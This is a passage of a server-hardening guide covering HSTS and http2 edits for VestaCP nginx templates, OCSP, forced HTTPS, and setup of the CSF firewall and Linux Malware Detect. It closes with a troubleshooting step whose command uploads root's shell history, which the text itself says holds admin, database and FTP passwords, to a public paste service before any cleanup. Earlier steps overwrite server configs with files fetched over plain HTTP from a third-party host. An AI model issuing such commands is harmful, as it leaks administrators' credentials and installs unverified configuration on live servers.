sed -i 's/proxy_ssl_port% ssl/proxy_ssl_port% http2 ssl/g' /usr/local/vesta/data/templates/web/nginx/hosting.stpl
sed -i 's/proxy_ssl_port% ssl/proxy_ssl_port% http2 ssl/g' /usr/local/vesta/data/templates/web/nginx/caching.stpl
# Enable http2 on the existing sites too
sed -i 's/443 ssl/443 http2 ssl/g' /home/admin/conf/web/*.nginx.ssl.conf
```
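Added example, not from the original post: the HSTS and http2 edits above wrapped in one idempotent shell function, plus checks that the header landed exactly once and inside the server block. It runs on a constructed VestaCP-style *.nginx.ssl.conf (the IP is from the documentation range), not on a real site file.

```shell
#!/bin/sh
# Added example: idempotent HSTS + http2 enablement for one nginx server block,
# verified on a constructed sample rather than a real /home/admin/conf/web file.

HSTS='add_header Strict-Transport-Security "max-age=31536000; includeSubDomains" always;'

# Remove any existing HSTS line, insert exactly one after server_name (the same
# delete-then-append order the guide uses for existing sites, so re-running never
# duplicates the header), and switch the TLS listener from "443 ssl" to "443 http2 ssl".
enable_hsts_http2() {
    sed -i '/Strict-Transport-Security/d' "$1"
    sed -i "/server_name/a $HSTS" "$1"
    sed -i 's/443 ssl/443 http2 ssl/g' "$1"
}

# Print how many HSTS headers FILE carries (0 when none; exactly 1 is correct).
hsts_count() {
    grep -c 'Strict-Transport-Security' "$1" || true
}

# Exit 0 if the 443 listener in FILE has http2 enabled.
listen_has_http2() {
    grep -Eq '^[[:space:]]*listen[[:space:]].*443 http2 ssl;' "$1"
}

# Exit 0 if the HSTS header is the line directly after server_name, i.e. inside the
# server block, which is where the sed insert above must land.
hsts_follows_server_name() {
    awk '/server_name/ { want = 1; next }
         want == 1 { if ($0 ~ /Strict-Transport-Security/) ok = 1; want = 0 }
         END { exit ok ? 0 : 1 }' "$1"
}

# Constructed sample in the layout VestaCP writes for a site's nginx SSL proxy config.
SAMPLE_CONF=$(mktemp)
trap 'rm -f "$SAMPLE_CONF"' EXIT
cat > "$SAMPLE_CONF" <<'EOF'
server {
    listen      203.0.113.10:443 ssl;
    server_name 520.be www.520.be;
    ssl_certificate      /home/admin/conf/web/ssl.520.be.pem;
    ssl_certificate_key  /home/admin/conf/web/ssl.520.be.key;
    error_log  /var/log/httpd/domains/520.be.error.log error;

    location / {
        proxy_pass      https://203.0.113.10:8443;
    }
}
EOF

enable_hsts_http2 "$SAMPLE_CONF"
enable_hsts_http2 "$SAMPLE_CONF"   # second run must still leave a single header
printf 'HSTS headers: %s\n' "$(hsts_count "$SAMPLE_CONF")"
cat "$SAMPLE_CONF"
```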
### Enable OCSP 🤔
```bash
rm -f /usr/local/vesta/ssl/dhparam.pem
# Options go before the bit count; newer OpenSSL releases reject them after it
openssl dhparam -out /usr/local/vesta/ssl/dhparam.pem 2048
cd /usr/local/vesta/ssl
wget -O root.pem https://ssl-tools.net/certificates/dac9024f54d8f6df94935fb1732638ca6ad77c13.pem
wget -O intermediate.pem https://letsencrypt.org/certs/lets-encrypt-x3-cross-signed.pem
rm -f chained.pem
cat intermediate.pem > chained.pem
cat root.pem >> chained.pem
chown -h root:mail /usr/local/vesta/ssl/*
```
# Restart the web front end and back end 🤔
```bash
# Tune nginx capacity
rm -f /etc/nginx/nginx.conf.bak
mv /etc/nginx/nginx.conf /etc/nginx/nginx.conf.bak
wget -O /etc/nginx/nginx.conf http://ns4.edu.ryukyu/VestaCP_conf/nginx.conf
wget -O /etc/httpd/conf.d/ssl.conf http://ns4.edu.ryukyu/VestaCP_conf/ssl.conf
# Check the configuration files
nginx -t
/opt/rh/httpd24/root/usr/sbin/apachectl -t
# Restart the services
nginx -s reload
systemctl restart httpd && systemctl status httpd -l
```
# Verify the OCSP setup. Note that this check cannot be run right away; it takes roughly 3 hours before the OCSP response is received correctly 🤔
```bash
openssl s_client -connect 520.be:443 -status -tlsextdebug < /dev/null 2>&1 | grep -i "OCSP response"
```

# Force HTTPS for the site 🤔
```bash
rm -f /home/admin/web/520.be/public_html/.htaccess.bak
mv -f /home/admin/web/520.be/public_html/.htaccess /home/admin/web/520.be/public_html/.htaccess.bak
cd /home/admin/web/520.be/public_html
cat <<"EOF" > /home/admin/web/520.be/public_html/.htaccess
RewriteEngine on
RewriteCond %{SERVER_PORT} 80
RewriteRule ^(.*)$ https://%{HTTP_HOST}%{REQUEST_URI} [L,R=301]
EOF
v-fix-websites-permissions
```
At this point a highly secure website environment is fully configured 🤔

Installing the CSF firewall and the LMD malware scanner
CSF (ConfigServer Security & Firewall) is a very comprehensive firewall that supports all the popular hosting control panels out of the box; call it the indispensable remedy for home and travel 🤔
```bash
# Install the dependencies
sudo yum install -y iptables ipset e2fsprogs nano perl perl-Time-HiRes \
  perl-GDGraph perl-libwww-perl perl-LWP-Protocol-https perl-Crypt-SSLeay \
  perl-Net-SSLeay
# Install the main program
rm -fr /opt/csf.tgz /etc/csf
cd /opt
rm -f csf.tgz
wget -O csf.tgz https://download.configserver.com/csf.tgz
tar xzf csf.tgz
cd csf
sh install.vesta.sh
```
# After installation CSF automatically whitelists the IP you are connected from and the currently open ports; then run its self-test 🤔
```bash
# Update the LFD ignore lists
wget -O /etc/csf/csf.fignore http://ns4.edu.ryukyu/conf/csf.fignore.md
wget -O /etc/csf/csf.pignore http://ns4.edu.ryukyu/conf/csf.pignore.md
cd /opt
rm -fr csf*
perl /usr/local/csf/bin/csftest.pl
```
### Change the network interface being monitored; note that if it is eth0 no change is needed 🤔
```bash
sed -i 's/^ETH_DEVICE =.*$/ETH_DEVICE = "ens3"/g' /etc/csf/csf.conf
cat /etc/csf/csf.conf | grep "ETH_DEVICE ="
```
# Enable ipset, a very handy feature 🤔
```bash
sed -i 's/^LF_IPSET =.*$/LF_IPSET = "1"/g' /etc/csf/csf.conf
cat /etc/csf/csf.conf | grep "LF_IPSET ="
```
# On OpenVZ, by contrast, IPSET must be turned off before CSF will start 🤔
```bash
sed -i 's/^LF_IPSET =.*$/LF_IPSET = "0"/g' /etc/csf/csf.conf
cat /etc/csf/csf.conf | grep "LF_IPSET ="
sed -i 's/^ETH_DEVICE =.*$/ETH_DEVICE = "venet0"/g' /etc/csf/csf.conf
cat /etc/csf/csf.conf | grep "ETH_DEVICE ="
```
# Enable IPv6 monitoring 🤔
```bash
sed -i 's/^#ETH6_DEVICE/ETH6_DEVICE/g' /etc/csf/csf.conf
cat /etc/csf/csf.conf | grep "ETH6_DEVICE ="
```
# Finally, turn off testing mode 🤔
```bash
sed -i 's/^TESTING =.*$/TESTING = "0"/g' /etc/csf/csf.conf
cat /etc/csf/csf.conf | grep "TESTING ="
```
### If Webmin is installed on the host, you can add the CSF module to Webmin 🤔
# In the Webmin console, open Webmin Configuration > Webmin Modules in the left-hand menu, choose From local file and enter
/usr/local/csf/csfwebmin.tgz
or
/etc/csf/csfwebmin.tgz
Once installed, it appears under System > ConfigServer Security & Firewall in the left-hand menu
# Common CSF commands 🤔
```bash
# Quickly add an IP to the deny list
csf -d 8.8.8.8
# Quickly add an IP to the allow list
csf -a 8.8.8.8
# Reload the configuration
csf -r
# Check CSF status
csf -l
# Pause CSF
csf -x
# Resume CSF
csf -e
# Update CSF itself
csf -u
# Restart the CSF service
systemctl restart csf
```
### Linux Malware Detect is an open-source security tool that has been around for years, although I don't install the clamav antivirus here (clamav only makes sense with 4GB of RAM or more) 🤔
```bash
# Install the dependencies
yum install -y inotify-tools
# Install the main program
cd /opt
curl -O http://www.rfxn.com/downloads/maldetect-current.tar.gz
tar -zxf maldetect-current.tar.gz
cd maldetect-*
bash install.sh
```
# Change the settings 🤔
```bash
sed -i 's/email_alert="0"/email_alert="1"/g' /usr/local/maldetect/conf.maldet
sed -i "s/you@domain.com/admin@520.be/g" /usr/local/maldetect/conf.maldet
sed -i 's/scan_clamscan="1"/scan_clamscan="0"/g' /usr/local/maldetect/conf.maldet
sed -i 's/quarantine_hits="0"/quarantine_hits="1"/g' /usr/local/maldetect/conf.maldet
sed -i 's/quarantine_clean="0"/quarantine_clean="1"/g' /usr/local/maldetect/conf.maldet
cd /opt
rm -fr maldetect*
```
That completes all the setup. If you run into problems, feel free to post a screenshot and include as much of what you did as you can 🤔
```bash
# Uploads root's shell history to a public paste service. After the steps above that history holds
# the admin, database and FTP passwords in clear text, so remove them from it before sharing.
curl -F'file=@/root/.bash_history' https://0x0.st
```
